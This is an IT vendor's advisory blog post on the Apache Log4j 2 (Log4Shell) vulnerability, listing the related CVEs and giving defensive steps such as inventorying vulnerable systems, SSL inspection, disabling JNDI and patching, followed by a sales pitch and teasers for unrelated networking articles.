Recommendations for Apache Log4J 2 Vulnerability

Apache Log4j 2 vulnerability

A new critical vulnerability has been found in a popular Apache java-based logging service known as Log4j 2. Log4j is widely used in many Java applications and ships by default with many enterprise applications, IT management systems, and over 400,000 open-source projects. This is a critical vulnerability that is actively being exploited by threat actors across the globe. GDT highly recommends that you take steps to analyze your current environment, evaluate mitigations, configure protections, and upgrade vulnerable systems as quickly as is feasible given your business operations.

The vulnerability known as Log4shell permits attackers to execute remote code on the target host. Many Java-based applications leverage log4j as their logging utility and are vulnerable, making this one of the most broadly available and easily exploited vulnerabilities in recent years. 

Current CVEs: 

  • CVE-2021-44228 
  • CVE-2021-45046 
  • CVE-2017-5645, 
  • CVE-2019-17571 

 

GDT’s Recommendations 

Identify vulnerable systems:

  • Identifying existing vulnerable systems in your environment is a key step in protecting and patching. This can be a significant effort but is key to a successful response. Existing inventory management and software lifecycle management systems will aid in this effort. There are also some scanning tools being made freely available by security researchers. As with many events like this, attackers know organizations will be scrambling for these tools and may embed malware in scanners and make them available on the web, so it is vital that you ensure you’re getting any scanning tools from a trusted source.
  • Many IT infrastructure systems use Apache and Java for their management interfaces, so it’s important to identify IT systems as a part of the discovery. This includes network management systems, IP phone systems, video surveillance management systems, information security systems, etc.
    • Application and API inspection: 
      • From an edge or transit network perspective, next-generation firewalls and web application inspection services can detect and block these types of attacks. One key prerequisite would be to ensure proper SSL inspection is enabled on existing next-generation firewalls and web application inspection services. For cloud-based services, API security rules can be deployed leveraging many of the cloud security tools available from our partners. Host technology such as XDR can detect and block this attack today, so ensuring servers, endpoints, and management systems are actively using a managed XDR solution significantly reduces the risk associated with these types of attacks.
    • Application Policy enforcement: 
      • Assess and/or develop whitelisting strategies as it pertains to next-generation firewalls for key corporate applications to mitigate suspicious traffic and remote calls to unexpected applications and/or servers. Note: Utilization of application server firewalls to prevent unexpected communication between applications is recommended. 
    • Java Recommendations: 
      • Disable JNDI, if possible, within your log4j deployment. This may be a complex task given development and application dependencies but may be a good interim compensating control, barring other options.
    • Patching options: 

Contact GDT: 

GDT has experts on staff that are actively aiding our clients with identifying and patching their systems, enabling SSL inspection, maturing their security posture, and ensuring they’re getting the most out of their existing security tools. Contact GDT for more details and to schedule a call with our expert Solutions Architects.

Author

Share this article

You might also like:

Are you making the most of your Cisco renewals? Most organizations treat renewals as tactical exercises: a check-the-box task to extend coverage, process a purchase order, and avoid service disruption. But this reactive approach misses a tremendous opportunity. When approached strategically, a Cisco renewal can be far more than a

You may have already heard, but if not, I’m pleased to inform you that HPE has officially completed its acquisition of Juniper Networks. First announced back in January of 2024, the HPE Juniper acquisition is now a done deal. Juniper’s CEO, Rami Rahim, is charged with leading the HPE Networking

The Cisco True Forward: How to avoid surprise costs

It started with an invoice they didn’t expect—$280,000 in unbudgeted costs tied to licenses they didn’t even know they were overusing. That was the moment this healthcare provider realized how important Cisco True Forward visibility really is. And they’re not alone.  For organizations that rely on Cisco to power critical